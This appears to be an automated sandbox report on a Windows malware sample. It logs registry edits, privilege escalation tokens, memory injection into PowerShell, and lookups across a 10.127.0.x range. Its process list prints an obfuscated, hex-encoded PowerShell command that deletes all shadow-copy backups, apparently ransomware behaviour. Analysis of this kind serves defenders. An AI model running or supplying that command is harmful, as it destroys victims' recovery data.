File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat C:\Windows\System32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\MusNotifyIcon.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\MusNotifyIcon.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.027665" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "1.203114" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4048" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WaaSMedicAgent.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WaaSMedicAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" C:\Windows\System32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7b787986\ = "7b787986" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986 C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\7b787986\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\7b787986.ico" C:\Users\Admin\AppData\Local\Temp\sample.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3364 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3364 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sample.exe

"C:\Users\Admin\AppData\Local\Temp\sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\MusNotifyIcon.exe

%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe bde72de7fd8c7da63275c7fcaacb8c08 RsHqXmyNdEm+SwwVHEOx/g.0.1.0.0.0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p

Network

Country Destination Domain Proto
US 8.8.8.8:53 settings-win.data.microsoft.com udp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
NL 8.248.7.254:80 tcp
NL 8.248.7.254:80 tcp
NL 8.248.7.254:80 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
IE 51.104.162.50:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
NL 20.73.194.208:443 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
